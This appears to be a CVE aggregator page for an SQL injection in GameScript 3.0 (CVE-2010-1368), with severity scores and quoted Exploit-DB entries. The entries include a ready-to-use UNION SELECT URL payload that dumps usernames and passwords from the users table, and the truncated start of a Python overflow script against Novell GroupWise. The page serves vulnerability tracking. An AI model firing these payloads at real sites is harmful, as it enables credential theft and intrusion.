CVE-2010-1368
published 2010-04-13CVE-2010-1368: SQL injection vulnerability in index.php in GameScript (GS) 3.0 allows remote attackers to execute arbitrary SQL commands via the id parameter in a category…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.97%
57.4th percentile
SQL injection vulnerability in index.php in GameScript (GS) 3.0 allows remote attackers to execute arbitrary SQL commands via the id parameter in a category action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gamescript | gamescript | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Novell Groupwise 8.0 - Multiple Remote Vulnerabilities
exploitdb·2010-11-08
CVE-2010-4715 Novell Groupwise 8.0 - Multiple Remote Vulnerabilities
Novell Groupwise 8.0 - Multiple Remote Vulnerabilities
---
source: https://www.securityfocus.com/bid/44732/info
Novell GroupWise is prone to multiple security vulnerabilities, including multiple remote code-execution vulnerabilities, an information-disclosure issue, and a cross-site scripting issue.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, obtain potentially sensitive information, or execute arbitrary code in the context of the user running the affected application. Information harvested may aid in further attacks; other attacks are also possible.
#!/usr/bin/python
#
# Francis Provencher for Protek Research Lab's.
#
#
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = '\x41' * 1368
s.connect(('192.
Exploit-DB
GameScript 3.0 - SQL Injection
exploitdb·2010-02-25
CVE-2010-1368 GameScript 3.0 - SQL Injection
GameScript 3.0 - SQL Injection
---
Author : FormatXformat
Home : Tkurd.net
Script : http://www.gamescript.net
Vulnerabilities : SQL Injection
Dork:
Copyright © 2005 - 2006 GameScript.net. All Games Copyright © To Their Respective Owners. All Rights Reserved.
Exploit:
/index.php?action=category&id=-6+union+all+select+1,concat(username,0x3a,password),3+from+users--
Admin page: admincp
Demo :
http://server/index.php?action=category&id=-6+union+all+select+1,concat(username,0x3a,password),3+from+users--
No writeups or analysis indexed.
http://packetstormsecurity.org/1002-exploits/gamescript-sql.txthttp://www.exploit-db.com/exploits/11577http://www.securityfocus.com/bid/38414https://exchange.xforce.ibmcloud.com/vulnerabilities/56537http://packetstormsecurity.org/1002-exploits/gamescript-sql.txthttp://www.exploit-db.com/exploits/11577http://www.securityfocus.com/bid/38414https://exchange.xforce.ibmcloud.com/vulnerabilities/56537
2010-04-13
Published